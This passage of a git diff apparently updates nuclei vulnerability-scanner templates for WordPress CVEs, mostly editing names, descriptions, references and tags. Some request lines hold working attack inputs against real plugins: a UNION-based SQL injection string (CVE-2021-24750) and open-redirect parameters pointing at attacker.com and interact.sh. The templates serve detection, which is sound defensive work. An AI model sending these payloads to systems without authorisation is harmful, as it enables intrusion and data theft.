     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24316
     cwe-id: CWE-79
-  tags: cve,cve2021,mediumish,xss,wordpress
+  tags: cve,cve2021,mediumish,xss,wordpress,wpscan
 
 requests:
   - method: GET
@@ -37,3 +39,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24320.yaml b/cves/2021/CVE-2021-24320.yaml
index 2da8f6ec7e..97f0a00ae9 100644
--- a/cves/2021/CVE-2021-24320.yaml
+++ b/cves/2021/CVE-2021-24320.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-24320
 
 info:
-  name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Bello Directory & Listing Theme <1.6.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
-    bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing
-    page, leading to reflected Cross-Site Scripting issues.
+  description: WordPress Bello Directory & Listing theme before 1.6.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape the listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value,
+    bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameters in the ints listing
+    page.
   reference:
     - https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
     - https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24320
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24320
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin
+  tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve
 
 requests:
   - method: GET
@@ -37,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24335.yaml b/cves/2021/CVE-2021-24335.yaml
index 23d734e054..60e83be043 100644
--- a/cves/2021/CVE-2021-24335.yaml
+++ b/cves/2021/CVE-2021-24335.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-24335
 
 info:
-  name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site
-    Scripting issue
+  description: WordPress Car Repair Services & Auto Mechanic before 4.0 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the serviceestimatekey parameter before outputting it back in the page.
   reference:
+    - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
+    - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
+    - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24335
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin
+  tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan
 
 requests:
   - method: GET
@@ -35,3 +37,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24340.yaml b/cves/2021/CVE-2021-24340.yaml
index c2c3e82279..f7848f82d0 100644
--- a/cves/2021/CVE-2021-24340.yaml
+++ b/cves/2021/CVE-2021-24340.yaml
@@ -1,20 +1,22 @@
 id: CVE-2021-24340
 
 info:
-  name: WordPress Plugin WP Statistics < 13.0.8 - Unauthenticated Time-Based Blind SQL Injection
+  name: WordPress Statistics <13.0.8 - Blind SQL Injection
   author: lotusdll
   severity: high
-  description: The WP Statistic WordPress plugin was affected by an Unauthenticated Time-Based Blind SQL Injection security vulnerability.
+  description: WordPress Statistic plugin versions prior to version 13.0.8 are affected by an unauthenticated time-based blind SQL injection vulnerability.
   reference:
     - https://www.exploit-db.com/exploits/49894
     - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
     - https://github.com/Udyz/WP-Statistics-BlindSQL
+    - https://wpscan.com/vulnerability/d2970cfb-0aa9-4516-9a4b-32971f41a19c
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24340
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-24340
     cwe-id: CWE-89
-  tags: cve,cve2021,wordpress,wp-plugin,unauth,sqli,blind
+  tags: cve,wp-plugin,unauth,wpscan,cve2021,wordpress,sqli,blind,edb
 
 requests:
   - method: GET
@@ -48,3 +50,5 @@ requests:
       - type: dsl
         dsl:
           - compare_versions(version, '< 13.0.8')
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24342.yaml b/cves/2021/CVE-2021-24342.yaml
index 3a16a48e13..08481d2f5f 100644
--- a/cves/2021/CVE-2021-24342.yaml
+++ b/cves/2021/CVE-2021-24342.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-24342
 
 info:
-  name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
+  description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).
   reference:
     - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24342
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24342
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin
+  tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve
 
 requests:
   - raw:
@@ -41,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24358.yaml b/cves/2021/CVE-2021-24358.yaml
index 143dda88dc..8730e877df 100644
--- a/cves/2021/CVE-2021-24358.yaml
+++ b/cves/2021/CVE-2021-24358.yaml
@@ -1,4 +1,4 @@
-id: elementorpage-open-redirect
+id: CVE-2021-24358
 
 info:
   name: Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect
@@ -8,10 +8,13 @@ info:
   reference:
     - https://wpscan.com/vulnerability/fd4352ad-dae0-4404-94d1-11083cb1f44d
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24358
+    - https://theplusaddons.com/changelog/
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
     cve-id: CVE-2021-24358
     cwe-id: CWE-601
-  tags: wordpress,redirect,wp-plugin,elementor,wp
+  tags: wp,wpscan,cve,cve2021,wordpress,redirect,wp-plugin,elementor
 
 requests:
   - raw:
@@ -20,7 +23,7 @@ requests:
         Host: {{Hostname}}
 
       - |
-        GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
+        GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
         Host: {{Hostname}}
 
     redirects: true
@@ -28,7 +31,7 @@ requests:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
 
     extractors:
       - type: regex
diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml
index e11de86391..a361b30189 100644
--- a/cves/2021/CVE-2021-24364.yaml
+++ b/cves/2021/CVE-2021-24364.yaml
@@ -1,11 +1,10 @@
 id: CVE-2021-24364
 
 info:
-  name: Jannah < 5.4.4 (XSS)
+  name: WordPress Jannah Theme <5.4.4 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site
-    Scripting (XSS) vulnerability.
+  description: WordPress Jannah theme before 5.4.4 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page.
   reference:
     - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24364
@@ -14,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24364
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-theme
+  tags: cve,cve2021,wordpress,xss,wp-theme,wpscan
 
 requests:
   - method: GET
@@ -37,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24370.yaml b/cves/2021/CVE-2021-24370.yaml
new file mode 100644
index 0000000000..a058161264
--- /dev/null
+++ b/cves/2021/CVE-2021-24370.yaml
@@ -0,0 +1,42 @@
+id: CVE-2021-24370
+
+info:
+  name: Fancy Product Designer WordPress plugin - Remote Code Execution (Detection)
+  author: pikpikcu
+  severity: critical
+  description: |
+    Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.
+  reference:
+    - https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
+    - https://wpscan.com/vulnerability/82c52461-1fdc-41e4-9f51-f9dd84962b38
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24370
+    - https://lists.openwall.net/full-disclsure/2020/11/17/2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-24370
+    cwe-id: CWE-434,CWE-434
+  metadata:
+    google-query: inurl:“/wp-content/plugins/fancy-product-designer”
+  tags: fancyproduct,wpscan,cve,cve2021,wordpress,rce,wp-plugin,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{"error":"You need to define a directory'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-24387.yaml b/cves/2021/CVE-2021-24387.yaml
index 823dc3a998..53743717b6 100644
--- a/cves/2021/CVE-2021-24387.yaml
+++ b/cves/2021/CVE-2021-24387.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-24387
 
 info:
-  name: Real Estate 7 WordPress Theme < 3.1.1 - Unauthenticated Reflected XSS
+  name: WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting
   author: suman_kar
   severity: medium
   description: |
-    The WP Pro Real Estate 7 WordPress theme before 3.1.1 did not properly sanitise the ct_community parameter
-    in its search listing page before outputting it back in it, leading to a reflected Cross-Site Scripting which
-    can be triggered in both unauthenticated or authenticated user context
+    WordPress Pro Real Estate 7 theme before 3.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the ct_community parameter in its search listing page before outputting it back.
   reference:
     - https://cxsecurity.com/issue/WLB-2021070041
+    - https://wpscan.com/vulnerability/27264f30-71d5-4d2b-8f36-4009a2be6745
+    - https://contempothemes.com/wp-real-estate-7/changelog/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24387
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24387
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wordpress
+  tags: cve,cve2021,xss,wordpress,wpscan
 
 requests:
   - raw:
@@ -38,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24389.yaml b/cves/2021/CVE-2021-24389.yaml
index 3a395f6c74..ec9ed88d0d 100644
--- a/cves/2021/CVE-2021-24389.yaml
+++ b/cves/2021/CVE-2021-24389.yaml
@@ -1,19 +1,19 @@
 id: CVE-2021-24389
 
 info:
-  name: FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress FoodBakery <2.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The WP Foodbakery WordPress plugin before 2.2, used in the FoodBakery WordPress theme before 2.2 did not properly sanitize the foodbakery_radius parameter before outputting it back in the response,
-    leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability.
+  description: WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.
   reference:
+    - https://wpscan.com/vulnerability/23b8b8c4-cded-4887-a021-5f3ea610213b
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24389
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24389
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-plugin
+  tags: cve,cve2021,wordpress,xss,wp-plugin,wpscan
 
 requests:
   - method: GET
@@ -35,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24406.yaml b/cves/2021/CVE-2021-24406.yaml
index 3eab806058..3b3096a52c 100644
--- a/cves/2021/CVE-2021-24406.yaml
+++ b/cves/2021/CVE-2021-24406.yaml
@@ -14,17 +14,17 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24406
     cwe-id: CWE-601
-  tags: wordpress,redirect,cve,cve2021
+  tags: wpscan,wordpress,redirect,cve,cve2021
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
+      - "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
 
 # Enhanced by mp on 2022/04/13
diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml
index d55c79db30..35366bfbc6 100644
--- a/cves/2021/CVE-2021-24407.yaml
+++ b/cves/2021/CVE-2021-24407.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-24407
 
 info:
-  name: Jannah < 5.4.5 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Jannah Theme <5.4.5 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.
+  description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.
   reference:
     - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24407
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24407
     cwe-id: CWE-79
-  tags: cve,cve2021,wordpress,xss,wp-theme
+  tags: cve,cve2021,wordpress,xss,wp-theme,wpscan
 
 requests:
   - raw:
@@ -41,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24472.yaml b/cves/2021/CVE-2021-24472.yaml
index 9bbf1caed5..935ae6bb31 100644
--- a/cves/2021/CVE-2021-24472.yaml
+++ b/cves/2021/CVE-2021-24472.yaml
@@ -13,7 +13,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-24472
     cwe-id: CWE-918
-  tags: cve,cve2021,wordpress,lfi,ssrf,oast
+  tags: wordpress,lfi,ssrf,oast,wpscan,cve,cve2021
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-24488.yaml b/cves/2021/CVE-2021-24488.yaml
index 227a6f412a..6ab0297b25 100644
--- a/cves/2021/CVE-2021-24488.yaml
+++ b/cves/2021/CVE-2021-24488.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-24488
 
 info:
-  name: WordPress Plugin Post Grid < 2.1.8 - XSS
+  name: WordPress Post Grid <2.1.8 - Cross-Site Scripting
   author: cckuailong
   severity: medium
-  description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+  description: WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,
   reference:
     - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24488
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+  tags: authenticated,wpscan,cve,cve2021,xss,wp,wordpress,wp-plugin
 
 requests:
   - raw:
@@ -43,3 +43,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24495.yaml b/cves/2021/CVE-2021-24495.yaml
index 38a0bfd215..5205d9265c 100644
--- a/cves/2021/CVE-2021-24495.yaml
+++ b/cves/2021/CVE-2021-24495.yaml
@@ -1,19 +1,21 @@
 id: CVE-2021-24495
 
 info:
-  name: Wordpress Plugin Marmoset Viewer XSS
+  name: Wordpress Marmoset Viewer <1.9.3 - Cross-Site Scripting
   author: johnjhacking
   severity: medium
-  description: The Marmoset Viewer WordPress plugin before 1.9.3 does not property sanitize, validate or escape the 'id' parameter before outputting back in the page, leading to a reflected Cross-Site Scripting issue.
+  description: WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.
   reference:
     - https://johnjhacking.com/blog/cve-2021-24495-improper-neutralization-of-input-during-web-page-generation-on-id-parameter-in-wordpress-marmoset-viewer-plugin-versions-1.9.3-leads-to-reflected-cross-site-scripting/
     - https://wordpress.org/plugins/marmoset-viewer/#developers
+    - https://wpscan.com/vulnerability/d11b79a3-f762-49ab-b7c8-3174624d7638
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24495
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24495
     cwe-id: CWE-79
-  tags: cve,cve2021,wp-plugin,wordpress,xss
+  tags: xss,wpscan,cve,cve2021,wp-plugin,wordpress
 
 requests:
   - method: GET
@@ -37,3 +39,5 @@ requests:
       - type: word
         words:
           - "Marmoset Viewer"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24498.yaml b/cves/2021/CVE-2021-24498.yaml
index 2ac66c4bd8..3d2b787f2b 100644
--- a/cves/2021/CVE-2021-24498.yaml
+++ b/cves/2021/CVE-2021-24498.yaml
@@ -1,18 +1,19 @@
 id: CVE-2021-24498
 
 info:
-  name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting
   author: suman_kar
   severity: medium
-  description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue.
+  description: WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).
   reference:
     - https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-24498
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-24498
     cwe-id: CWE-79
-  tags: cve,cve2021,xss,wordpress,wp-plugin
+  tags: cve,cve2021,xss,wordpress,wp-plugin,wpscan
 
 requests:
   - raw:
@@ -40,3 +41,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24499.yaml b/cves/2021/CVE-2021-24499.yaml
index b4aec22e36..40e23891e0 100644
--- a/cves/2021/CVE-2021-24499.yaml
+++ b/cves/2021/CVE-2021-24499.yaml
@@ -1,20 +1,21 @@
 id: CVE-2021-24499
 
 info:
-  name: Workreap WordPress theme - unauthenticated RCE
+  name: WordPress Workreap - Remote Code Execution
   author: daffainfo
   severity: critical
-  description: The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed
-    for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
+  description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
   reference:
     - https://github.com/RyouYoo/CVE-2021-24499
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24499
+    - https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb
+    - https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-24499
     cwe-id: CWE-434
-  tags: cve,cve2021,wordpress,wp-plugin,rce,intrusive
+  tags: cve,cve2021,rce,workreap,wpscan,wordpress,wp-plugin,intrusive,wp
 
 requests:
   - raw:
@@ -41,11 +42,13 @@ requests:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
 
       - type: word
         part: body
         words:
           - "71abe5077dae2754c36d731cc1534d4d"
+
+      - type: status
+        status:
+          - 200
+# Enhanced by mp on 2022/05/16
diff --git a/cves/2021/CVE-2021-24510.yaml b/cves/2021/CVE-2021-24510.yaml
index 37b803ab59..892c3a4d7f 100644
--- a/cves/2021/CVE-2021-24510.yaml
+++ b/cves/2021/CVE-2021-24510.yaml
@@ -1,10 +1,10 @@
 id: CVE-2021-24510
 
 info:
-  name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
-  description: The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue
+  description: WordPress MF Gig Calendar plugin 1.1 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize or escape the id GET parameter before outputting back in the admin dashboard when editing an event.
   reference:
     - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24510
@@ -13,7 +13,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-24510
     cwe-id: CWE-79
-  tags: wordpress,cve,cve2021,wp-plugin,authenticated
+  tags: wp-plugin,authenticated,wpscan,wordpress,cve,cve2021
 
 requests:
   - raw:
@@ -46,3 +46,5 @@ requests:
         part: header
         words:
           - "text/html"
+
+# Enhanced by mp on 2022/08/28
diff --git a/cves/2021/CVE-2021-24746.yaml b/cves/2021/CVE-2021-24746.yaml
index 3ed4f8b80a..46fe96c882 100644
--- a/cves/2021/CVE-2021-24746.yaml
+++ b/cves/2021/CVE-2021-24746.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-24746
 
 info:
-  name: WordPress Sassy Social Share Plugin - Reflected XSS
+  name: WordPress Sassy Social Share Plugin - Cross-Site Scripting
   author: Supras
   severity: medium
   description: WP plugin Sassy Social Share < 3.3.40 - Reflected Cross-Site Scripting
@@ -15,7 +15,7 @@ info:
     cwe-id: CWE-79
   metadata:
     google-query: inurl:"/wp-content/plugins/sassy-social-share"
-  tags: cve,cve2021,wordpress,wp-plugin,xss,wp
+  tags: cve,cve2021,wordpress,wp-plugin,xss,wp,wpscan
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-24750.yaml b/cves/2021/CVE-2021-24750.yaml
index bfd5e03eda..cd8eabe133 100644
--- a/cves/2021/CVE-2021-24750.yaml
+++ b/cves/2021/CVE-2021-24750.yaml
@@ -1,20 +1,24 @@
 id: CVE-2021-24750
 
 info:
-  name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
+  name: WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection
   author: cckuakilong
   severity: high
-  description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which
-    could allow users with a role as low as subscriber to perform SQL injection attacks.
+  description: WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.
   reference:
     - https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
+    - https://wpscan.com/vulnerability/7528aded-b8c9-4833-89d6-9cd7df3620de
+    - https://plugins.trac.wordpress.org/changeset/2622268
     - https://nvd.nist.gov/vuln/detail/CVE-2021-24750
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2021-24750
     cwe-id: CWE-89
-  tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
+  tags: authenticated,wpscan,cve,cve2021,sqli,wp,wordpress,wp-plugin
+
+variables:
+  num: "999999999"
 
 requests:
   - raw:
@@ -28,7 +32,7 @@ requests:
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
       - |
-        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
+        GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
@@ -37,8 +41,10 @@ requests:
       - type: word
         part: body
         words:
-          - "266f89556d2b38ff067b580fb305c522"
+          - '{{md5({{num}})}}'
 
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/22
diff --git a/cves/2021/CVE-2021-24762.yaml b/cves/2021/CVE-2021-24762.yaml
index 4aff726f96..bd44c3b812 100644
--- a/cves/2021/CVE-2021-24762.yaml
+++ b/cves/2021/CVE-2021-24762.yaml
@@ -1,21 +1,22 @@
 id: CVE-2021-24762
 
 info:
-  name: Perfect Survey WordPress plugin before 1.5.2 SQLI
+  name: WordPress Perfect Survey<1.5.2 - SQL Injection
   author: cckuailong
   severity: critical
-  description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated
-    users to perform SQL injection.
+  description: |
+    Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
   reference:
     - https://www.exploit-db.com/exploits/50766
     - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
